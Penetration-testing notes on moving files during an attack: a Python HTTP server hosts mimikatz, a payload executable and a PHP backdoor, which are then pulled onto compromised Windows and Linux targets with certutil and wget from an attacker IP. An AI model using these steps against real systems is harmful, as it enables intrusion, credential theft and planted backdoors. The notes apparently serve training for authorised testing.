Transferring Files

Python Web Server

Python modules can be useful for setting up a web server that hosts the files required for transfer. These modules

• Check Python version

python -V
python3 -V
py -v # on Windows

• SimpleHTTPServer - python2 module

# If Python version returned is 2.X
python -m SimpleHTTPServer <PORT_NUMBER>

• http.server - python3 module

# If Python version is 3.X
python3 -m http.server <PORT>

# On Windows, try 
python -m http.server <PORT>
py -3 -m http.server <PORT>

e.g.

• Copy a file into the current directory and setup the web server to download the file into the target system

cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe .

# Python 2.7
python -m SimpleHTTPServer 80

# Python 3.7
python3 -m http.server 80

• Files can be downloaded from a browser or using a GET request

Transferring Files

#Windows

• Set up a web server to host the payload.exe file

# Attacker machine
cd /root/Desktop/ # payload.exe must be here
python3 -m http.server 80

• After gaining access to the Windows target system and spawned a command shell session, download the payload file on the target system using the certutil tool in cmd.

# Windows Target machine
cd C:\Temp
certutil -urlcache -f http://<ATTACKER-IP>/payload.exe payload.exe

#Linux

• After exploiting the Linux target, transfer the php-backdoor.php file to the target.

• 2 terminal sessions are necessary - use tmux utility to get more sessions.

tmux - is a program, terminal multiplexer, which runs in a terminal and allows multiple other terminal programs to be run inside it

sudo apt install tmux -y

# Attacker machine
tmux
# ... Exploitation with MSFconsole in Terminal 0 ...
# CTRL+B and then C to open a new terminal session

cd /usr/share/webshells/php/
ip -br -c a
	192.219.50.2
python3 -m http.server 80

# CTRL+B then 0 (zero) to navigate to the first Terminal session
# Target machine
/bin/bash -i
wget http://192.219.50.2/php-backdoor.php